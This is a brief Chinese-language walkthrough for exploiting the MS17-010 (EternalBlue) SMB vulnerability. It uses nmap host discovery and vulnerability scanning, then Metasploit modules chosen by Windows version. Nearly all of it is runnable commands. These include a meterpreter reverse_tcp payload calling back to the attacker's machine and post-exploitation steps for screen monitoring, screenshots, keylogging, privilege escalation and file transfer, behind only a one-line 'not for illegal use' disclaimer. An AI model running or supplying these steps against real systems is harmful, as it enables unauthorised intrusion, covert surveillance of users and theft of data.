入侵漏洞:ms17_010
请勿用于非法用途
第一步:
发现存活主机
nmap -sn 192.168.1.0/24
第二步:
扫描漏洞
nmap -T4 --script vuln 192.168.0.107
扫描到漏洞smb-vuln-ms17-010(永恒之蓝)
第三步:
打开metasploit
msfconsole
第四步:
查找ms17-010漏洞
search ms17-010
选择漏洞模块
win2003/winxp版本选用:exploit/windows/smb/ms17_010_psexec
win7/win2008选用: exploit/windows/smb/ms17_010_eternalblue
win8/win8.1选用:exploit/windows/smb/ms17_010_eternalblue_win8
这里是win2003所以输入
use exploit/windows/smb/ms17_010_psexec
查看模块属性
show options
设置目标ip
set rhosts 192.168.0.107
设置载块
set payload windows/meterpreter/reverse_tcp
设置自己的主机ip
set lhost 192.168.0.105
查看属性
show options
开始渗透
exploit
第五步:
现在已经得到了meterpreter的回话
打开vnc屏幕监控
run vnc
其他命令:
screenshot #屏幕截图
shell #打开目标cmd
keyscan_start #开启键盘监听
keyscan_dump #查看监听记录
keyscan_stop #停止监听
getsystem #提权
upload a.exe c:/ #上传文件到c:/
download c:/a.exe /root #下载文件到root目录
ps #查看进程
kill 2312 #关闭pid为2312的进程